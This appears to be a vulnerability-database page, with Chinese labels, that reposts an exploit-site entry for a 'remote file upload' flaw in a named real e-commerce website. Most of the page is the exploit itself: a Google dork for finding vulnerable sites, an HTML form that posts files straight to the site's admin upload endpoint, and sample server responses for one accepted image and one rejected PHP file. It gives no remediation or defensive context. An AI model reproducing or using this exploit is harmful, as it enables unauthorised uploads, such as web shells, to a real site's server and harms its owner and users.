Makeupbarr Remote File Upload Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209739 漏洞类型
发布时间 2018-06-11 更新时间 2018-06-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060108
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:  Makeupbarr Remote File Upload Vulnerability
# Google Dork: intext:Copyright Makeupbarr.Com
# Exploit Author: Mr.T959
# Author Website : http://mr-t959.xyz
# Tested on: Windows 7
--------------------------------------

# Exploit HTML Code :
<form method='post' target='_blank' action='https://www.makeupbarr.com/Admin/server/php/' enctype='multipart/form-data'>
<input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>

# Exploit 
Admin/server/php/

# Successful 
{"files":[{"name":"ecc4cebd847cd68e07746262fd8d2ec2.jpeg","size":5362,"type":"image\/jpeg","url":"https:\/\/www.makeupbarr.com\/Admin\/server\/php\/files\/ecc4cebd847cd68e07746262fd8d2ec2.jpeg"

# Error
{"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]}

# Demo
https://www.makeupbarr.com/Admin/server/php/